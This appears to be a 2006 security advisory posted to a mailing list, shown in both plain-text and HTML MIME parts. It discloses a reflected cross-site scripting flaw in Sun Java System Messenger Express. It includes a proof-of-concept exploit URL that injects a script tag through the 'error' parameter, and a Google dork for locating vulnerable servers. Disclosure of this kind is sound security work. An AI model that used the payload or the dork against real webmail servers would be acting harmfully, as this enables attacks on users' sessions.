------=_Part_1542_5083137.1162268411579 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sun java System Messenger Express remote XSS vulnerabilities By: Handrix 29 November 2006 MorX security research team www.morx.org Description: Sun java System Messenger Express XSS The index script is vulnerable to XSS attacks, in functiion errorHTML . function errorHTML() { var s='' . . . document.write(s) ---> Need more case filetring the 's' var } So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks. Exploit: https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E Founded with Google by this dorks : intitle:"Sun Java(tm) System Messenger Express" Vulnerable versions : Sun java System Messenger Express Sun java System Messenger Express6 ------=_Part_1542_5083137.1162268411579 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Sun java System Messenger Express
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
29 November 2006
MorX security research team
www.morx.org

Description:
Sun java System Messenger Express XSS

The index script  is vulnerable to XSS attacks, in functiion errorHTML .

function errorHTML() {
  var s=''
  .
  .
  .

  document.write(s) ---> Need more case filetring the 's' var
}


So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.

Exploit:
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E

Founded with Google by this dorks :
intitle:"Sun Java(tm) System Messenger Express"

Vulnerable versions :
Sun java System Messenger Express
Sun java System Messenger Express6 ------=_Part_1542_5083137.1162268411579--